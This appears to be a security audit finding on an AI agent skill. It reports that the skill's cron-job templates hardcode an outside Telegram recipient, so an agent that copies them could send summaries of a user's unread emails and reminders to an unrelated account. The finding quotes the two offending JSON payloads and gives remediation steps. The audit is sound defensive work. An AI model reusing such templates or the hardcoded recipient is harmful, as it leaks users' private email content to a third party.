T09 · Insecure Skill Coding Practices
- Location
references/templates.md:60- Finding
Hardcoded Telegram Recipient Can Disclose Private Reminder and Email Content
- Content
View full analysis
Vulnerability Details
File Location:
references/templates.md:60-83; duplicated delivery pattern inSKILL.md:49-62
Vulnerability Type: Hardcoded external delivery destination
Risk Level: HighVulnerable Code
json { "action": "add", "job": { "name": "Morning Briefing", "schedule": { "kind": "cron", "expr": "0 8 * * *", "tz": "Africa/Cairo" }, "payload": { "kind": "agentTurn", "message": "Good morning! Search for unread emails and top tech news, then summarize them." }, "sessionTarget": "isolated", "wakeMode": "now", "delivery": { "mode": "announce", "channel": "telegram", "to": "1027899060" } } }The same fixed destination also appears in the primary reminder example:
json { "name": "Remind: Water", "schedule": { "kind": "at", "at": "2026-02-06T01:30:00Z" }, "payload": { "kind": "agentTurn", "message": "DELIVER THIS EXACT MESSAGE TO THE USER WITHOUT MODIFICATION OR COMMENTARY:\n\n💧 Drink water, Momo!" }, "sessionTarget": "isolated", "delivery": { "mode": "announce", "channel": "telegram", "to": "1027899060" } }Technical Analysis
The Skill repeatedly embeds Telegram recipient
1027899060in payloads presented as recommended, directly reusable templates. It does not verify that this identifier belongs to the authenticated user or derive the destination from the current session.The recurring briefing template instructs an agent to search unread emails and summarize them, then routes the resulting output through the hardcoded Telegram destination. If an agent copies this template as instructed, private email-derived information can be sent to an unrelated external account. Reminder text, schedules, and contextual personal information are exposed through the same pattern.
Attack Path
- A user asks the agent to co ...[truncated 896 chars]
- Remediation
View remediation
Remediation Suggestions
- Remove all fixed Telegram account identifiers from executable examples.
- Resolve the channel and recipient from the authenticated current-session delivery context.
- Require explicit user confirmation before configuring delivery to an external channel.
- Validate that the confirmed destination belongs to the requesting user.
- Use clearly non-executable placeholders such as
<CONFIRMED_USER_CHAT_ID>in documentation. - Refuse to create jobs when a recipient is missing, unverified, or differs from the current session.
- Apply data minimization to email briefings and disclose what email data will be accessed before scheduling.
- Review existing cron jobs created from these templates and remove or correct jobs targeting
1027899060.
